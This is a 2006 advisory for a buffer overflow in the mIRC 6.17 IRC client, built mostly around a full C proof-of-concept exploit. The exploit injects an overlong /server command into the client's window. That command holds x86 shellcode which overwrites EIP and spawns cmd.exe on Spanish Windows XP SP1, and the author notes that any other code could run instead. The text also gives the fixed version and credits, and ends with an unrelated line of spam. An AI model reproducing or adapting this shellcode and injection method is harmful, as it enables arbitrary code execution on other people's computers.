- 1 - Introduction Written by Khaled Mardam-Bey, mIRC is a friendly IRC client that is well equipped with options and tools. - 2 - Vulnerability description Vulnerable mIRC 6.17 and minor. Using the command /server with long parameters initially don't crash, but if introduces again the same text don't check the lenght when update the info and mIRC crash overwritting the EIP. It's a minor bug and DON'T ELEVATE PRIVILEGES. - 3 - How to exploit it This PoC open a cmd.exe,also it's possible execute any other code. ----------- mircServerexploitXPSP1.c ---------------------- /* This PoC it's for XP SP1 Spanish */ #include #include #include int main () { HWND lHandle; char command[512]= "http://server -a $str(A,352) $+ "; char command2[512]=" $+ $str(A,56) $+ "; char command3[512]=" $+ $str(B,52) "; char finalcommand[1024]=""; char strClass[30]; char shellcode[999]= "\x55" "\x8B\xEC" "\x33\xFF" "\x57" "\x83\xEC\x04" "\xC6\x45\xF8\x63" "\xC6\x45\xF9\x6D" "\xC6\x45\xFA\x64" "\xC6\x45\xFB\x2E" "\xC6\x45\xFC\x65" "\xC6\x45\xFD\x78" "\xC6\x45\xFE\x65" "\x8D\x45\xF8" "\x50" "\xBB\x44\x80\xbf\x77" "\xFF\xD3" "\x90\x90\xFF\xE1"; //Shellcode system("cmd.exe"), system in \xc7\x93\xc2\x77 0x77c293c7 (WinXP Sp1 Spanish) char saltaoffset[]="\xF0\xFA\xD8\x77\x90\x90\x90\x90\x90\x83\xEC\x74\xFF\xE4\x90\x90"; // 0x77D8FAF0 SetForegroundWindow(lHandle); lHandle = FindWindowEx(FindWindowEx(FindWindowEx(FindWindow("mIRC",NULL), 0, "MDIClient", 0),0, "mIRC_Status", 0), 0, "Edit", 0); if (!lHandle) { printf("Can't find mIRC\n"); return 0; } strcat(shellcode,command2); strcat(shellcode,saltaoffset); strcat(command,shellcode); strcat(command,command3); strcat(finalcommand,command); strcat(finalcommand,"| "); strcat(finalcommand,command); printf("%s\n", finalcommand); SendMessage(lHandle, WM_SETTEXT,0,(LPARAM)finalcommand); SendMessage (lHandle, WM_IME_KEYDOWN, VK_RETURN, 0); } /* Eof */ ----------- CUT HERE ---------------------- - 4 - Solution Fixed on mIRC 6.2. Link to download http://www.mirc.com/get.html - 5 - Credits URL Vendor: www.mirc.com Author: Jordi Corrales ( crowdat[at]gmail.com ) Date: 02/08/2006

亚洲欧美在线